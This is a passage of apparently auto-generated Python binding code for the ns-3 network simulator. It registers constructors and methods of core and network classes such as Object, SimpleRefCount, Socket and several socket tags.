## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object.h (module 'core'): void ns3::Object::Start() [member function]
cls.add_method('Start',
'void',
[])
## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
cls.add_constructor([param('ns3::Object const &', 'o')],
visibility='protected')
## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
cls.add_constructor([])
## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
cls.add_method('Next',
'ns3::Ptr< ns3::Object const >',
[])
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount(ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter< ns3::EventImpl > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4MulticastRoute > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4Route > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter< ns3::NixVector > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount(ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter< ns3::OutputStreamWrapper > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter< ns3::Packet > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Socket_methods(root_module, cls):
## socket.h (module 'network'): ns3::Socket::Socket(ns3::Socket const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Socket const &', 'arg0')])
## socket.h (module 'network'): ns3::Socket::Socket() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): int ns3::Socket::Bind(ns3::Address const & address) [member function]
cls.add_method('Bind',
'int',
[param('ns3::Address const &', 'address')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Bind() [member function]
cls.add_method('Bind',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::BindToNetDevice(ns3::Ptr<ns3::NetDevice> netdevice) [member function]
cls.add_method('BindToNetDevice',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'netdevice')],
is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Close() [member function]
cls.add_method('Close',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Connect(ns3::Address const & address) [member function]
cls.add_method('Connect',
'int',
[param('ns3::Address const &', 'address')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): static ns3::Ptr<ns3::Socket> ns3::Socket::CreateSocket(ns3::Ptr<ns3::Node> node, ns3::TypeId tid) [member function]
cls.add_method('CreateSocket',
'ns3::Ptr< ns3::Socket >',
[param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::TypeId', 'tid')],
is_static=True)
## socket.h (module 'network'): bool ns3::Socket::GetAllowBroadcast() const [member function]
cls.add_method('GetAllowBroadcast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Socket::GetBoundNetDevice() [member function]
cls.add_method('GetBoundNetDevice',
'ns3::Ptr< ns3::NetDevice >',
[])
## socket.h (module 'network'): ns3::Socket::SocketErrno ns3::Socket::GetErrno() const [member function]
cls.add_method('GetErrno',
'ns3::Socket::SocketErrno',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Node> ns3::Socket::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::Socket::GetRxAvailable() const [member function]
cls.add_method('GetRxAvailable',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::GetSockName(ns3::Address & address) const [member function]
cls.add_method('GetSockName',
'int',
[param('ns3::Address &', 'address')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Socket::SocketType ns3::Socket::GetSocketType() const [member function]
cls.add_method('GetSocketType',
'ns3::Socket::SocketType',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::Socket::GetTxAvailable() const [member function]
cls.add_method('GetTxAvailable',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Listen() [member function]
cls.add_method('Listen',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv(uint32_t maxSize, uint32_t flags) [member function]
cls.add_method('Recv',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv() [member function]
cls.add_method('Recv',
'ns3::Ptr< ns3::Packet >',
[])
## socket.h (module 'network'): int ns3::Socket::Recv(uint8_t * buf, uint32_t size, uint32_t flags) [member function]
cls.add_method('Recv',
'int',
[param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(uint32_t maxSize, uint32_t flags, ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'ns3::Ptr< ns3::Packet >',
[param('ns3::Address &', 'fromAddress')])
## socket.h (module 'network'): int ns3::Socket::RecvFrom(uint8_t * buf, uint32_t size, uint32_t flags, ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'int',
[param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')])
## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p, uint32_t flags) [member function]
cls.add_method('Send',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('Send',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p')])
## socket.h (module 'network'): int ns3::Socket::Send(uint8_t const * buf, uint32_t size, uint32_t flags) [member function]
cls.add_method('Send',
'int',
[param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
## socket.h (module 'network'): int ns3::Socket::SendTo(ns3::Ptr<ns3::Packet> p, uint32_t flags, ns3::Address const & toAddress) [member function]
cls.add_method('SendTo',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags'), param('ns3::Address const &', 'toAddress')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::SendTo(uint8_t const * buf, uint32_t size, uint32_t flags, ns3::Address const & address) [member function]
cls.add_method('SendTo',
'int',
[param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address const &', 'address')])
## socket.h (module 'network'): void ns3::Socket::SetAcceptCallback(ns3::Callback<bool, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionRequest, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> newConnectionCreated) [member function]
cls.add_method('SetAcceptCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionRequest'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'newConnectionCreated')])
## socket.h (module 'network'): bool ns3::Socket::SetAllowBroadcast(bool allowBroadcast) [member function]
cls.add_method('SetAllowBroadcast',
'bool',
[param('bool', 'allowBroadcast')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::SetCloseCallbacks(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> normalClose, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> errorClose) [member function]
cls.add_method('SetCloseCallbacks',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'normalClose'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'errorClose')])
## socket.h (module 'network'): void ns3::Socket::SetConnectCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionSucceeded, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionFailed) [member function]
cls.add_method('SetConnectCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionSucceeded'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionFailed')])
## socket.h (module 'network'): void ns3::Socket::SetDataSentCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> dataSent) [member function]
cls.add_method('SetDataSentCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'dataSent')])
## socket.h (module 'network'): void ns3::Socket::SetRecvCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> arg0) [member function]
cls.add_method('SetRecvCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'arg0')])
## socket.h (module 'network'): void ns3::Socket::SetRecvPktInfo(bool flag) [member function]
cls.add_method('SetRecvPktInfo',
'void',
[param('bool', 'flag')])
## socket.h (module 'network'): void ns3::Socket::SetSendCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> sendCb) [member function]
cls.add_method('SetSendCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'sendCb')])
## socket.h (module 'network'): int ns3::Socket::ShutdownRecv() [member function]
cls.add_method('ShutdownRecv',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::ShutdownSend() [member function]
cls.add_method('ShutdownSend',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::NotifyConnectionFailed() [member function]
cls.add_method('NotifyConnectionFailed',
'void',
[],
visibility='protected')
## socket.h (module 'network'): bool ns3::Socket::NotifyConnectionRequest(ns3::Address const & from) [member function]
cls.add_method('NotifyConnectionRequest',
'bool',
[param('ns3::Address const &', 'from')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyConnectionSucceeded() [member function]
cls.add_method('NotifyConnectionSucceeded',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyDataRecv() [member function]
cls.add_method('NotifyDataRecv',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyDataSent(uint32_t size) [member function]
cls.add_method('NotifyDataSent',
'void',
[param('uint32_t', 'size')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyErrorClose() [member function]
cls.add_method('NotifyErrorClose',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyNewConnectionCreated(ns3::Ptr<ns3::Socket> socket, ns3::Address const & from) [member function]
cls.add_method('NotifyNewConnectionCreated',
'void',
[param('ns3::Ptr< ns3::Socket >', 'socket'), param('ns3::Address const &', 'from')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyNormalClose() [member function]
cls.add_method('NotifyNormalClose',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifySend(uint32_t spaceAvailable) [member function]
cls.add_method('NotifySend',
'void',
[param('uint32_t', 'spaceAvailable')],
visibility='protected')
return
def register_Ns3SocketAddressTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketAddressTag::SocketAddressTag(ns3::SocketAddressTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketAddressTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketAddressTag::SocketAddressTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketAddressTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): ns3::Address ns3::SocketAddressTag::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_const=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketAddressTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketAddressTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketAddressTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::SetAddress(ns3::Address addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'addr')])
return
def register_Ns3SocketIpTtlTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag(ns3::SocketIpTtlTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketIpTtlTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketIpTtlTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketIpTtlTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint8_t ns3::SocketIpTtlTag::GetTtl() const [member function]
cls.add_method('GetTtl',
'uint8_t',
[],
is_const=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpTtlTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::SetTtl(uint8_t ttl) [member function]
cls.add_method('SetTtl',
'void',
[param('uint8_t', 'ttl')])
return
def register_Ns3SocketSetDontFragmentTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag(ns3::SocketSetDontFragmentTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketSetDontFragmentTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
